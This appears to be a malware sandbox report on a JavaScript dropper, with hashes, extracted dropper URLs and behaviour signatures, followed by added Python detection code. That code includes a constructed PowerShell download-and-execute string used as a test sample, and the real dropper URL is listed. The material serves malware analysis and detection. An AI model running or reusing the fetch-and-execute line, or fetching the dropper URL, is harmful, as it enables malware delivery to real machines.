General

  • Target

    poor.js

  • Size

    309KB

  • Sample

    230830-pyks9aee8y

  • MD5

    f3dbc8bfa9050a43d27eaf3f9351ecc0

  • SHA1

    b2b93e0ef1868d5304a5c30d501a23fe947167f6

  • SHA256

    a195bd116eb430573008a60b1ff0f24c78dcd2cb83e191d4a5c11d2443c50df8

  • SHA512

    660bf7f7d9936d0f37805847fea99bb406bf40f82f2143db755d0ca0a2fe0cce57b105945388ae6eca0ae5a1a083c762de86e21f753846d50cce3f71930a9e03

  • SSDEEP

    6144:HN0000qN0000HN00004N00002N0000J/iAWS88888VN00003N0000zN00006:HN0000qN0000HN00004N00002N0000uU

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • ps1.dropper

    https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535

  • exe.dropper

    https://uploaddeimagens.com.br/images/004/572/679/original/rump_js_link64_startup.jpg?1691689535
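Both dropper stages point at the same URL, and the URL ends in `.jpg` on an image-hosting site. A triage check worth automating is whether the bytes served at such a URL are really an image or a script/PE hidden behind an image extension. The following is an added example, not code from this report or from the sandbox; it works on constructed byte strings (labelled below), never touches the network, and its base64-unwrapping heuristic is an assumption about how payloads are commonly hidden in text, not something the report states about this sample.

```python
import base64
import re
from urllib.parse import urlparse

# URL from the extracted config (only used here to read the extension; nothing is downloaded).
DROPPER_URL = ("https://uploaddeimagens.com.br/images/004/572/679/original/"
               "rump_js_link64_startup.jpg?1691689535")

# Constructed sample "downloads" for offline testing; NOT the real content behind DROPPER_URL.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00" + b"\x00" * 32
SAMPLE_PE = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff" + b"\x00" * 48
SAMPLE_PS1 = (b"$u='https://example.invalid/x.jpg';"
              b"$b=(New-Object Net.WebClient).DownloadString($u);"
              b"iex ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($b)))")
# Text wrapper carrying a base64-encoded PE (assumed hiding pattern, constructed here).
SAMPLE_B64_PE = b"junk " + base64.b64encode(SAMPLE_PE) + b" junk"

MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF8", "gif"),
    (b"MZ", "pe"),
    (b"PK\x03\x04", "zip"),
]
IMAGE_KINDS = {"jpeg", "png", "gif"}
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
B64_BLOB = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def sniff(data: bytes) -> str:
    """Classify content by magic bytes; fall back to a printable-text heuristic."""
    for sig, name in MAGIC:
        if data.startswith(sig):
            return name
    head = data[:4096]
    if not head:
        return "unknown"
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in head)
    if printable / len(head) > 0.9:
        # Script-like text: look for base64 runs that decode to a PE header.
        for m in B64_BLOB.finditer(data):
            try:
                if base64.b64decode(m.group(0), validate=True).startswith(b"MZ"):
                    return "text+base64-pe"
            except ValueError:  # binascii.Error subclasses ValueError
                continue
        return "text"
    return "unknown"


def url_extension(url: str) -> str:
    """Extension of the last path segment, ignoring the query string."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def classify(url: str, data: bytes) -> dict:
    """Flag a mismatch when the URL claims an image but the bytes are not one."""
    kind = sniff(data)
    ext = url_extension(url)
    mismatch = ext in IMAGE_EXTS and kind not in IMAGE_KINDS
    return {"url": url, "ext": ext, "kind": kind, "mismatch": mismatch}


if __name__ == "__main__":
    for label, blob in (("jpeg", SAMPLE_JPEG), ("pe", SAMPLE_PE),
                        ("ps1", SAMPLE_PS1), ("b64pe", SAMPLE_B64_PE)):
        print(label, classify(DROPPER_URL, blob))
```

`mismatch` is the signal: an "image" URL returning `pe`, `text` or `text+base64-pe` is the pattern this config describes, and the classifier can be pointed at proxy captures or sandbox PCAP extracts without ever fetching the live URL.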

Targets

    • Target

      poor.js

      (size and hashes identical to the General section above)

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up the country code configured in the registry, likely a geofence check.

    • Drops file in System32 directory
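The three signatures above (a script host making a network request, a registry lookup of the configured country code, and a file dropped into System32) map directly onto host telemetry. The following is an added example, not part of this report, showing detection logic over constructed Sysmon-style events (event 1 process create, 3 network connection, 11 file create, 12/13 registry). The registry path matched for the geofence check and the dropped filename are assumptions for illustration; the page does not name either.

```python
import ntpath
from dataclasses import dataclass

# Processes that should rarely initiate their own network traffic or write into System32.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
JS_HOSTS = {"wscript.exe", "cscript.exe"}
PS_HOSTS = {"powershell.exe", "pwsh.exe"}
SYSTEM32 = r"c:\windows\system32"
# Assumed registry location of the per-user country setting (adjust to your telemetry).
GEO_KEY = r"\control panel\international"


@dataclass
class Event:
    event_id: int          # 1 = process create, 3 = network, 11 = file create, 12/13 = registry
    image: str             # full path of the acting process
    parent_image: str = ""  # only meaningful for event 1
    target: str = ""       # destination for 3, file path for 11, registry key for 12/13


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events modelled on the behaviour described in the report; not real telemetry.
EVENTS = [
    Event(1, PS, parent_image=r"C:\Windows\System32\wscript.exe"),
    Event(3, PS, target="uploaddeimagens.com.br:443"),
    Event(13, PS, target=r"HKU\S-1-5-21-1-2-3-1001\Control Panel\International\Geo\Nation"),
    Event(11, PS, target=r"C:\Windows\System32\dropped_constructed.exe"),
    Event(3, r"C:\Program Files\Mozilla Firefox\firefox.exe", target="example.invalid:443"),
]


def detect(events):
    """Return (rule, process, target) tuples for events matching the report's signatures."""
    findings = []
    for e in events:
        proc = ntpath.basename(e.image).lower()
        parent = ntpath.basename(e.parent_image).lower()
        tgt = e.target.lower()
        if e.event_id == 1 and proc in PS_HOSTS and parent in JS_HOSTS:
            findings.append(("js_to_powershell", proc, e.parent_image))
        if e.event_id == 3 and proc in SCRIPT_HOSTS:
            findings.append(("script_host_network", proc, e.target))
        if e.event_id in (12, 13) and proc in SCRIPT_HOSTS and GEO_KEY in tgt:
            findings.append(("geofence_lookup", proc, e.target))
        if e.event_id == 11 and proc in SCRIPT_HOSTS and tgt.startswith(SYSTEM32 + "\\"):
            findings.append(("script_host_drops_in_system32", proc, e.target))
    return findings


if __name__ == "__main__":
    for rule, proc, target in detect(EVENTS):
        print(f"{rule:32} {proc:16} {target}")
```

Each rule is deliberately narrow (process name from a fixed set, path prefix or key substring) so that a benign browser connection in the same stream produces no finding; tune the geofence key and the System32 prefix to what your EDR actually records before deploying.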
